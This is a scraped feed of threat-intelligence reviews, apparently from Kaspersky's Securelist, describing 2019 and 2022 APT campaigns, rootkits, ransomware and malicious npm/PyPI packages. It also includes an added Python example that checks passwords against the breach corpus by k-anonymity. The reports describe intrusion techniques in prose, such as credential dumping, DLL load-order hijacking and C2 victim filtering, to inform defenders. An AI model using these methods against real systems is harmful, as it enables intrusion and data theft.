Lazarus also targeted a mobile gaming company in South Korea that we believe was aimed at stealing application source code. 
It's clear that Lazarus keeps updating its tools very quickly.\n\nIn Q3, we tracked new activity by BlueNoroff, a sub-group of Lazarus. In particular, we identified a bank in Myanmar that this threat actor compromised. We promptly contacted the bank, to share the IoCs we had found. Our collaboration allowed us to obtain valuable information on how the attackers move laterally to access high-value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nAndariel, another sub-group of Lazarus, has traditionally focused on geo-political espionage and financial intelligence in South Korea. We observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. The malware is a brand new type of backdoor, called ApolloZeus, which is started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. 
The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign.\n\nIn October, we reported a campaign that began when we stumbled upon a sample that uses interesting decoy documents and images containing a contact list of North Korean overseas residents. Almost all of the decoys contain content regarding the national holiday of the Korean Peninsula and the national day of North Korea. The lure content was also related to diplomatic issues or business relationships. Alongside the additional data from our telemetry, we believe that this campaign is aimed at targets with a relationship with North Korea, such as business people, diplomatic entities and human rights organizations. The actor behind this campaign used high-profile spear phishing and multi-stage infection in order to implant tailored Ghost RAT malware that can fully control the victim. We believe that the threat actor behind this campaign, which has been ongoing for more than three years, speaks Korean; and we believe that the DarkHotel APT group is behind it.\n\nThe Lamberts is a family of sophisticated attack tools used by one or multiple threat actors. The arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools and wipers for carrying out destructive attacks. We created a colour scheme to distinguish the various tools and implants used against different victims around the world. More information about the Lamberts arsenal is available in our 'Unraveling the Lamberts Toolkit' report, available to our APT Intel customers. This year, we added several new colours to the Lamberts palette. 
The Silver Lambert, which appears to be the successor of Gray Lambert, is a full-fledged backdoor, implementing some specific [NOBUS](<https://en.wikipedia.org/wiki/NOBUS>) and [OPSEC](<https://en.wikipedia.org/wiki/Operations_security>) concepts such as protection from C2 sink-holing by checking the server SSL certificate hash, self-uninstall for orphaned instances (i.e. where the C2 is unavailable) and low level file-wiping functionality. We observed victims of Silver Lambert in China, in the Aeronautics sector. Violet Lambert, a modular backdoor that appears to have been developed and deployed in 2018, is designed to run on various versions of Windows \u2013 including Windows XP, as well as Vista and later versions of Windows. We observed victims of Violet Lambert in the Middle East. We also found other new Lamberts implants on computers belonging to a critical infrastructure victim in the Middle East. The first two we dubbed Cyan Lambert (including Light and Pro versions). The third, which we called Magenta Lambert, reuses older Lamberts code and has multiple similarities with the Green, Black and White Lamberts. This malware listens on the network, waiting for a magic ping, and then executes a very well-hidden payload that we have been unable to decrypt. All the infected computers went offline shortly after our discovery.\n\nEarly in the year, we monitored a campaign by the LuckyMouse threat actor that had been targeting Vietnamese government and diplomatic entities abroad since at least April 2018. We believe that this activity, which we call SpoiledLegacy, is the successor to the IronTiger campaign because of the similar tools and techniques it uses. The SpoiledLegacy operators use penetration-testing frameworks such as Cobalt Strike and Metasploit. 
While we believe that they exploit network service vulnerabilities as their main initial infection vector, we have also observed executables prepared for use in spear-phishing messages containing decoy documents, showing the operator's flexibility. Besides pen-testing frameworks, the operators use the NetBot downloader and Earthworm SOCKS tunneler. The attackers also include HTran TCP proxy source code into the malware, to redirect traffic. Some NetBot configuration data contains LAN IPs, indicating that it downloads the next stage from another infected host in the local network. Based on our telemetry, we believe that internal database servers are among the targets, as in a previous LuckyMouse Mongolian campaign. As the last stage, the attackers use different in-memory 32- and 64-bit Trojans injected into system process memory. Interestingly, all the tools in the infection chain dynamically obfuscate Win32 API calls using leaked HackingTeam code. From the start of 2019, we observed a spike in LuckyMouse activity, both in Central Asia and in the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. Despite different open-source publications discussing this actor's TTPs during the last year, LuckyMouse hasn't changed any of them. The threat actor still relies on its own tools to get a foothold in the victim's network, which in the new campaigns consists of using HTTPBrowser as a first stager, followed by the Soldier Trojan as a second stage implant. The group made a change to its infrastructure, as it seems to rely uniquely on IPv4 addresses instead of domain names for its C2s, which we see as an attempt to limit correlation.\n\nThe HoneyMyte APT has been active for several years. 
The group has adopted different techniques to perform its attacks over the past couple of years, and has targeted governments in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh, along with remote foreign embassies located in Pakistan, South Korea, the US, the UK, Belgium, Nepal, Australia and Singapore. This year, the group has targeted government organizations related to natural resource management in Myanmar and a major continental African organization, suggesting that one of the main motivations of HoneyMyte is gathering geopolitical and economic intelligence. While the group targeted a military organization in Bangladesh, it's possible that the individual targets were related to geo-political activity in the region.\n\nThe Icefog threat actor, which we have been tracking since 2011, has consistently targeted government institutions, military contractors, maritime and shipbuilding organizations, telecom operators, satellite operators, industrial and high technology companies, and mass media located mainly in Korea, Japan and Central Asia. Following [our original report on Icefog in 2013](<https://securelist.com/the-icefog-apt-a-tale-of-cloak-and-three-daggers/57331/>), the group's operational tempo slowed and we detected a very low number of active infections. We observed a slight increase in 2016; then, beginning in 2018, Icefog began conducting large waves of attacks against government institutions and military contractors in Central Asia, which are strategically important to China's Belt and Road Initiative. In the latest wave of attacks, the infection began with a spear-phishing email containing a malicious document that exploits a known vulnerability and ultimately deploys a payload. From 2018 to the beginning of 2019, the final payload was the typical Icefog backdoor. Since May 2019, the actors appear to have switched and are now using Poison Ivy as their main backdoor. 
The Poison Ivy payload is dropped as a malicious DLL and is loaded using a signed legitimate program, using a technique called load order hijacking. This technique is very common with many actors and it was also used in previous Icefog campaigns. During our investigation, we were also able to detect artefacts used in the actor's lateral movement. We observed the use of a public TCP scanner downloaded from GitHub, a Mimikatz variant to dump credentials from system memory, a customized keylogger to steal sensitive information, and a newer version of another backdoor named Quarian. The Quarian backdoor was used to create tunnels inside the victim infrastructure in an attempt to avoid network detections. The functionality of Quarian includes the ability to manipulate the remote file system, get information about the victim, steal saved passwords, download or upload arbitrary files, create tunnels using port forwarding, execute arbitrary commands, and start a reverse shell.\n\n## Evolution of the 'newcomers'\n\nWe first discussed ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia, in a private report in January 2018. Related activities date back to more than a decade ago, with similar code maintaining compilation timestamps from 2004. Since then, ShaggyPanther activity has been detected in several more locations: most recently in Indonesia in July, and \u2013 somewhat surprisingly \u2013 in Syria in March. The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used web shell shared by multiple Chinese-speaking actors. SinoChopper not only performs host identification and backdoor delivery but also email archive theft and additional activity. 
Although not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019, we observed ShaggyPanther targeting Windows servers.\n\nIn April, we published our report on [TajMahal](<https://securelist.com/project-tajmahal/90240/>), a previously unknown APT framework that has been active for the last five years. This is a highly sophisticated spyware framework that includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, documents, and cryptography key stealers; and even its own file indexer for the victim's computer. We discovered up to 80 malicious modules stored in its encrypted Virtual File System \u2013 one of the highest numbers of plugins we have ever seen in an APT toolset. The malware features its own indexer, emergency C2s, the ability to steal specific files from external drives when they become available again, and much more. There are two different packages, self-named Tokyo and Yokohama and the targeted computers we found include both packages. We think the attackers used Tokyo as the first stage infection, deploying the fully functional Yokohama package on interesting victims, and then leaving Tokyo in place for backup purposes. Our telemetry revealed just a single victim, a diplomatic body from a country in Central Asia. This begs the question, why go to all that trouble for just one victim? We think there may be other victims that we haven't found yet. 
This theory is supported by the fact that we couldn't see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected.\n\nIn February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows \u2013 the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we had discovered in the preceding months. Further analysis led us to uncover a zero-day vulnerability in win32k.sys. Microsoft patched this vulnerability, CVE-2019-0797, on March 12, crediting Kaspersky researchers Vasiliy Berdnikov and Boris Larin with the discovery. We think that several threat actors, including FruityArmor and SandCat, used this exploit. FruityArmor had used zero-days before, while SandCat is a new APT actor that we discovered not long before. Interestingly, FruityArmor and SandCat seem to follow parallel paths, both having the same exploits available at the same time. This seems to point to a third party providing both groups with such artefacts.\n\nDuring February 2019, we observed a highly targeted attack in the southern part of Russia using a previously unknown malware that we call Cloudmid. This spy program spread via email and masqueraded as the VPN client of a well-known Russian security company that, among other things, provides solutions to protect networks. So far, we have been unable to relate this activity to any known actor. The malware itself is a simplistic document stealer. However, given its victimology and the targeted nature of the attack, we considered it relevant enough to monitor, even though we were unable to attribute this set of activities to any known actor. 
The low OPSEC and simplistic malware involved in this operation does not seem to point to an advanced threat actor.\n\nIn February, we identified a campaign targeting military organizations in India that we were unable to attribute to any known threat actor. The attackers rely on watering holes and spear phishing to infect their victims. Specifically, they were able to compromise the Centre for Land Warfare Studies (CLAWS) website, using it to host a malicious document used to distribute a variant of the Netwire RAT. We also found evidence of a compromised welfare club for military personnel distributing the same malware during the same period.\n\nIn Q3, we observed a campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and subsequently underwent constant development. We have only seen this malware used in a small number of active campaigns since January, all targeting government, military and diplomatic entities in the Southeast Asia region. The latest campaign, conducted in August, seems to have targeted only a select few individuals working for a military organization.\n\n## Privacy matters\n\nOn January 17, security researcher Troy Hunt reported a [leak of more than 773 million email and 21 million unique password records](<https://www.troyhunt.com/the-773-million-record-collection-1-data-reach/>). The data, dubbed Collection #1, were originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1 TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this 'new' leak. 
It turned out that Collection #1 was just part of a [larger dump of leaked credentials comprising 2.2 billion stolen account records](<https://threatpost.com/collection-1-data-dump-hacker-identified/141447/>). The new data dump, dubbed Collection #2-5, was discovered by researchers at the Hasso Plattner Institute in Potsdam.\n\nIn February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, [were put up for sale on Dream Market](<https://www.theregister.co.uk/2019/02/11/620_million_hacked_accounts_dark_web/>), accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies [was posted](<https://www.zdnet.com/article/127-million-user-records-from-8-companies-put-up-for-sale-on-the-dark-web/>) to the same market place. Then in March, the [hacker behind the earlier data dumps posted stolen data from a further six companies](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>).\n\nStolen credentials, along with other personal information harvested from data leaks, is valuable not only to cybercriminals but also to targeted attackers, including those wishing to [track the activities of dissidents and activists](<https://www.amnesty.org/en/latest/research/2019/03/phishing-attacks-using-third-party-applications-against-egyptian-civil-society-organizations/>) in various parts of the world.\n\nWe've become used to a steady stream of reports in the news about leaks of email addresses and passwords. The theft of such 'traditional' forms of authentication is bad enough, but the effects of using alternative methods of authentication can be much more serious. 
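Credential dumps of the Collection #1 kind are only useful to a defender if staff can check their own passwords against them without handing the passwords to anyone. Troy Hunt's Pwned Passwords service offers a k-anonymity range lookup for exactly that, and the Python below, an added example written for this page rather than anything from the Securelist post, walks through the mechanics offline. The range-response body and its counts are constructed; only the 5-character SHA-1 prefix would ever be sent to the service in a real lookup.

```python
import hashlib

def sha1_hex_upper(password):
    # Pwned Passwords keys on the upper-case hex SHA-1 of the UTF-8 password.
    return hashlib.sha1(password.encode('utf-8')).hexdigest().upper()

def split_for_range_query(password):
    # k-anonymity split: only the 5-char prefix is sent to the service
    # (GET https://api.pwnedpasswords.com/range/{prefix}); the 35-char suffix stays local.
    digest = sha1_hex_upper(password)
    return digest[:5], digest[5:]

def parse_range_response(text):
    # Response body is one 'SUFFIX:COUNT' line per leaked hash sharing the prefix.
    counts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        suffix, _, count = line.partition(':')
        counts[suffix.upper()] = int(count)
    return counts

# Constructed stand-in for the body of /range/5BAA6 (the prefix of SHA-1('password')).
# Real responses hold hundreds of lines; these suffixes and counts are made up, except
# that the third suffix is the genuine remainder of SHA-1('password').
CONSTRUCTED_RANGE_BODY = '''
0018A45C4D1DEF81644B54AB7F969B88D65:1
00D4F6E8FA6EECAD2A3AA415EEC418D38EC:2
1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493
011053FD0102E94D6AE2F8B83D76FAF94F6:1
'''

def constructed_fetch_range(prefix):
    # Offline replacement for the HTTPS call; serves only the one canned prefix.
    return CONSTRUCTED_RANGE_BODY if prefix == '5BAA6' else ''

def breach_count(password, fetch_range=constructed_fetch_range):
    # Number of times the password appeared in the corpus, 0 if unseen. The full hash
    # never leaves this function; fetch_range only ever sees the prefix.
    prefix, suffix = split_for_range_query(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)

if __name__ == '__main__':
    for pw in ('password', 'correct horse battery staple'):
        print(repr(pw), 'seen', breach_count(pw), 'times')
```

To go live, replace constructed_fetch_range with a function that performs the HTTPS GET for the prefix and returns the body unchanged; the suffix comparison stays on the caller's machine, which is the whole point of the scheme.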
In August, [two Israeli researchers discovered](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>) fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database. The exposure of biometric data is of particular concern. A compromised password can be changed, but a biometric characteristic is for life.\n\nMoreover, the more widespread use of smart devices in new areas of our lives opens up a bigger pool of data for attackers. Consider, for example, the potential impact of smart speakers for listening in on unguarded conversations in the home. Social media giants are sitting on a growing pile of personal information \u2013 information that would prove very valuable to criminals and APT threat actors alike.\n\n## Final thoughts\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more, please reach out to us at [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)", "cvss3": {}, "published": "2019-12-04T10:00:22", "type": "securelist", "title": "APT review: what the world\u2019s threat actors got up to in 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-0797"], "modified": "2019-12-04T10:00:22", "id": "SECURELIST:C7E3F6A27205B506CE8683317323C0BC", "href": "https://securelist.com/ksb-2019-review-of-the-year/95394/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-18T08:07:16", "description": "\n\n * **IT threat evolution in Q3 2022**\n * [IT threat evolution in Q3 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/>)\n * [IT threat evolution in Q3 2022. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n## Targeted attacks\n\n### CosmicStrand: discovery of a sophisticated UEFI rootkit\n\nIn July, we [reported a rootkit](<https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/>) that we found in modified [Unified Extensible Firmware Interface](<https://encyclopedia.kaspersky.com/glossary/uefi/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren't easy to create: the slightest programming error could crash the machine. Nevertheless, in our [APT predictions for 2022](<https://securelist.com/advanced-threat-predictions-for-2022/104870/>), we noted that more attackers would reach the sophistication level required to develop such tools.\n\nThe main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers. Having successfully passed through all stages of the boot process, the rootkit eventually runs a shell code and contacts the attackers' C2 (Command-and-Control) server, from which it receives a malicious payload.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/07/20124904/CosmicStrand_UEFI_malware_01.png>)\n\nWe were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named "aaaabbbb" in the operating system with local administrator rights.\n\nWe identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. 
All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it's likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.\n\nIt's also unclear how the attackers managed to deliver the malware. It's possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.\n\n### Andariel deploys DTrack and Maui ransomware\n\nOn 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an [alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>) in which they accused North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, [we determined](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.\n\nAndariel's primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. 
When the attackers find noteworthy data, the Maui ransomware is deployed \u2013 it is typically detected on targeted hosts 10 hours after the activation of DTrack.\n\nThe attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.\n\nTo infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.\n\nOur research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.\n\n### VileRAT: DeathStalker's continuous strike at foreign and crypto-currency exchanges\n\nIn late August 2020, we published an [overview of DeathStalker](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the [PowerPepper](<https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/>) campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of [an evasive and highly intricate attack campaign](<https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/>) against foreign exchange and cryptocurrency trading companies. 
We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.\n\nSince we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/05135347/VileRAT_DeathStalkers_continuous_strike_02.png>)\n\nThe threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses \u2013 the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.\n\nOn the other side, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain, is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates. 
For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.\n\nUsing only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 \u2013 in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.\n\nWe do not know what DeathStalker's principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets' customers. However, it does not appear to be direct financial gain.\n\n### Kimsuky's GoldDragon cluster and C2 operations\n\nKimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22113157/Kimsukys_GoldDragon_03.png>)\n\nThe attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it's in the target list. The first-stage script also forwards the victim's IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. 
The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it's an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/22112947/Kimsukys_GoldDragon_01.png>)\n\nBased on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.\n\nOur [research](<https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/>) underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.\n\n### Targeted attacks on industrial enterprises\n\nIn August, Kaspersky ICS CERT experts reported [a wave of targeted attacks on military industrial complex enterprises and public institutions](<https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/?utm_source=securelist&utm_medium=link&utm_campaign=targeted-attack-on-industrial-enterprises-and-public-institutions>) in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments. 
We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.\n\nThe attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability, which enables an attacker to execute arbitrary code \u2013 in this case, the main module of the PortDoor backdoor \u2013 without any additional user action.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/03155648/APT_TA428_targeted_attack_01.png>)\n\nThe attackers used five different backdoors at the same time \u2013 probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries \u2013 these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.\n\n## Other malware\n\n### Prilex: the pricey prickle credit card complex\n\nPrilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. 
Since then the group has greatly improved its malware: it develops complex threats and poses a major threat to the payment chain. Prilex is now conducting so-called "GHOST" attacks \u2013 fraudulent transactions using cryptograms, which are pre-generated by the victim's card during the store payment process.\n\nThe group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.\n\nPrior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers' server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/28092316/Prilex_ATM_and_PoS_report_10_1.png>)\n\nHaving attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.\n\nIn [our recent investigation](<https://securelist.com/prilex-atm-pos-malware-evolution/107551/>), we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion \u2013 used by professional development teams. 
Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the [dark web](<https://encyclopedia.kaspersky.com/glossary/dark-web/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), for example, in 2019 a German bank [lost more than \u20ac1.5 million](<https://www.zdnet.com/article/german-bank-loses-eur1-5-million-in-mysterious-cashout-of-emv-cards/>) in a similar attack by the Prilex malware. The development of its MaaS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.\n\nWe also discovered web sites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these web sites, as they could be copycats.\n\n### Luna and Black Basta: new ransomware for Windows, Linux and ESXi\n\nRansomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year \u2013 the [BlackCat](<https://www.kaspersky.com/blog/black-cat-ransomware/44120/>) gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: [Black Basta and Luna](<https://securelist.com/luna-black-basta-ransomware/106950/>).\n\nBlack Basta, first discovered in February, exists in versions for Windows and for Linux \u2013 the latter primarily targeting ESXi virtual machine images. 
One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don't work in Safe Mode.\n\nAt the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.\n\nLuna, discovered in June and also written in Rust, is able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.\n\n### Malicious packages in online code repositories\n\nIn July, we reported a malicious campaign that we named [LofyLife](<https://securelist.com/lofylife-malicious-npm-packages/107014/>). Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.\n\nThe identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The "formatting headlines" package was in Brazilian Portuguese with a "#brazil" hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.\n\nThe packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. 
The malicious payload consisted of malware written in Python dubbed Volt Stealer \u2013 an open-source malicious script \u2013 and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim's IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim's actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.\n\nThe npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. [This is not the first time we've seen an npm package poisoned in this way](<https://www.kaspersky.com/blog/uaparser-js-infected-versions/42700/>).\n\nnpm is not the only such code repository to have been targeted recently. In August, Check Point [published a report](<https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/>) on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers' personal data and credentials. Following this research, [we discovered two other malicious Python packages in the PyPI](<https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/>), masquerading as one of the most popular open-source packages named "[requests](<https://pypi.org/project/requests/#files>)".\n\nThe attacker used a description of the legitimate "requests" package in order to trick victims into installing a malicious one. 
